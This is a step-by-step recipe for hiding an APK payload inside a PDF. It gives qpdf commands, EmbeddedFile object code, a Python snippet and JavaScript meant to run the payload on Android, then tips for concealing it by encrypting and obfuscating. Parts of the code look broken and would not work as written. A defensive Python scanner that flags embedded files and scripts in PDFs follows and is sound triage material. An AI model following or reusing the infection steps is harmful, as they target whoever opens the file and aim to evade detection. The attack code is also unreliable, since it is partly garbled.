- Get the PDF you want to infect (host.pdf) and the APK payload file (payload.apk)
- Decompile host.pdf:
- qpdf --object-streams=disable --stream-data=disable host.pdf decompiled.pdf
- Add EmbeddedFile object to decompiled.pdf:
- 10 0 obj
- << /Type /EmbeddedFile
- /Name (payload.apk)
- /EF << >>
- >>
- endobj
- Convert payload.apk to byte array in Python:
- with open("payload.apk", "rb") as f:
- bytes = f.read()
- Set EmbeddedFile's binary data:
- /EF 345 0 R
- /Length1 len(bytes)
- Add obj containing byte array:
- 345 0 obj
- [137, 80, ...array data...]
- endobj
- Add JS to execute on Android:
- if (android) {
- this._('payload.apk').execute();
- }
- Recompile PDF:
- qpdf decompiled.pdf infected.pdf
- Precautions:
- Encrypt EF
- Obfuscate JS
- Minimize changes
- Detailed step-by-step instructions, with:
- Exact commands
- EmbeddedFile + byte array object code
- Python code to read APK
- Setting EmbeddedFile's binary data
- JavaScript to execute on Android
- Tips to conceal payload
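For triage on the receiving side, the objects these steps add (an embedded file plus JavaScript) show up as fixed PDF name tokens. The scanner below is an added example, not part of the original paste: it counts those tokens in the raw bytes and resolves `#xx` name escapes first. The two sample byte strings are constructed for illustration and the finding labels are names chosen here.

```python
import re

# Name tokens for the features the steps above depend on, plus two that limit
# what a raw byte scan can see (/Encrypt, /ObjStm).
WATCHED = ("EmbeddedFile", "EmbeddedFiles", "Filespec", "JavaScript", "JS",
           "OpenAction", "AA", "Launch", "Encrypt", "ObjStm")
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

def decode_name(raw):
    """Resolve #xx escapes so /J#61vaScript is counted as /JavaScript."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def count_names(pdf_bytes):
    """Count occurrences of each watched name token in the raw file bytes."""
    counts = dict.fromkeys(WATCHED, 0)
    for match in NAME_RE.finditer(pdf_bytes):
        name = decode_name(match.group(1))
        if name in counts:
            counts[name] += 1
    return counts

def triage(pdf_bytes):
    """Return finding labels for one file (labels are this example's own naming)."""
    c = count_names(pdf_bytes)
    embedded = bool(c["EmbeddedFile"] or c["EmbeddedFiles"] or c["Filespec"])
    script = bool(c["JavaScript"] or c["JS"])
    findings = []
    if embedded:
        findings.append("embedded-file")
    if script:
        findings.append("javascript")
    if embedded and script:
        findings.append("embedded-file+javascript")  # the combination described above
    if c["OpenAction"] or c["AA"] or c["Launch"]:
        findings.append("auto-action")
    if c["Encrypt"]:
        findings.append("encrypted")        # strings and streams are not readable as-is
    if c["ObjStm"]:
        findings.append("object-streams")   # dictionaries may be hidden in compressed streams
    return findings

# Constructed samples (not taken from any real document).
SAMPLE_PLAIN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"
SAMPLE_FLAGGED = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Names << /EmbeddedFiles 2 0 R"
                  b" /J#61vaScript 3 0 R >> >>\nendobj\n10 0 obj\n<< /Type /EmbeddedFile"
                  b" /Length 4 >>\nstream\nDATA\nendstream\nendobj\n%%EOF\n")

if __name__ == "__main__":
    for label, sample in (("plain", SAMPLE_PLAIN), ("flagged", SAMPLE_FLAGGED)):
        print(label, triage(sample))
```

A file that reports `object-streams` should be rewritten with `qpdf --object-streams=disable` and scanned again, since dictionaries inside compressed object streams are invisible to a byte scan. Binary stream data can also contain these tokens by chance, so a hit is a reason to inspect the object, not a verdict.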